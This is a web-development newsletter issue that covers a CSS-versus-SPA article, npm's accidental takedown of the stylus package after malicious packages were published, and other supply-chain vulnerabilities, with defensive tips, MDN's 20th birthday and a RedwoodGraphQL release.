Issue #26: Attack

🎵 Your promises, they look like lies; your honesty, like a back that hides a knife… 🎵

This week wasn’t too rich for JavaScript tooling ecosystem news and metaframeworks updates, but it was quite rich for bad news from the supply chain side of the projects we all build with these (and other) tools. Of course, it’s not all dark and sad, and hopefully we’ll finish on a positive note, but as usual, even the bad news bring at least one good outcome. Experience.

The Good

Jon Alderson came up with a piece of developer wisdom full of contradictory opinions (but also of a lot of experience and insights) on building for the Web using SPAs and MPAs, called “It’s time for modern CSS to kill the SPA”. And even though metaframeworks are directly antiheroes of this blogpost, indirectly they are the answer (as often) with so many MPA capabilities they provide out of the box. Of course the author was saying about such tech as Wordpress and alike but it is not always the best choice and many professional seasoned developers made their choice in favour of metaframeworks and metaframework-like tools instead, as they can be much lighter, slicker, minimalist, and easier in maintenance choices. With that, the ideas the article declares make total sense, even though there are some simplifications and assumptions in terms of uselessness of SPA approach. But in the end, both opponents and supporters of metaframework ideas can agree on one thing:

Use React if you want. Use Tailwind, Vite, whatever. Just don’t ship it all to the browser unless you need to.

The Bad

But not only performance and sanity ideas unite web developers of all kinds. It is also the inevitable common adversary — dependencies.

Well, yes, while it sounds lame being a truly practically unavoidable thing in software development, especially in the JavaScript ecosystem, it also brings a lot of danger. The more things you depend on, the more risks you factor into your day-to-day work.

For me personally the problems started out of the blue with a CI/CD failure that came with a team member’s PR one beautiful day. Together with hundreds of thousands of developers (I assume) we discovered that npm had accidentally removed stylus package from its global registry. I was surprised, taking into account the last thing I built with Stylus was probably this cutie from ages ago, but we figured as both Webpack and Vite depend on Stylus, it’s actually a big deal for almost everyone who builds for the web.

Panya, who is one of the maintainers of the stylus package, published [several malicious packages], and because of that, his account was banned, and all the packages that were connected to him were yanked, including the Stylus one. So that’s the story here.

As of today, the package is fortunately restored, making all the downstream consumers happy. Interestingly,

This incident marks the first notable instance of a registry taking down an entire legitimate project in what appears to be an administrative error.

But unfortunately, it was not the last npm problem of the last week. Again, impacting a lot of developers using npm as a foundation, several packages brought serious vulnerabilities, including such hits as is (which you didn’t use of course, right? Right?!) and eslint-plugin-prettier. There are lots of insights in the article and the sources referenced, but all in all, it never hurts to repeat that:

Developers working with open source packages should:

• Monitor repository visibility changes in search of suspicious or unusual publishing of packages
• Review package.json lifecycle scripts before installing dependencies
• Use automated security scanning in continuous integration and continuous delivery pipelines
• Regularly rotate authentication tokens
• Use multifactor authentication to safeguard repository accounts

The Noteworthy

I love I have this “Noteworthy” section to ease out the anxiety caused by the previous one. And this time we have something to celebrate again!

No matter how you like or don’t like Mozilla and things they build, if you had started your career even just some time before the ChatGPT era, you cannot help knowing (and loving, if you’re me) MDN. Unarguably the best resource for learning web development in tech history celebrates its 20th birthday this July. Can’t help wishing this project another 20 years ahead, no matter what route the knowledge sharing world goes in the future. I personally keep such tools in my heart no matter what.

Another news that brought joy to hearts of people who still believe in open source tools was the new release of RedwoodGraphQL which was seemingly left behind recently in favour of RedwoodSDK. It’s always good to have choices and have projects of love surviving big environmental upheavals.

And to make this newsletter project survive potential upheavals too, I made some updates and fixes to enable proper RSS functionality for it. Now, thanks to the awesome Astro docs that helped a lot to make it happen, you can use your RSS reader of choice to get the latest and greatest from the Metaframeworks Weekly (either by dropping this website’s link in directly, or using the classic RSS XML link).

With that reference in hand, I again call you to keep as few dependencies as possible in your life and work and build both things in a responsible and aware way. But still, if some npm package (or some newsletter) makes your life easier, nurture your relationships with it and don’t forget to drop them some occasional visit. They value that a lot.

👋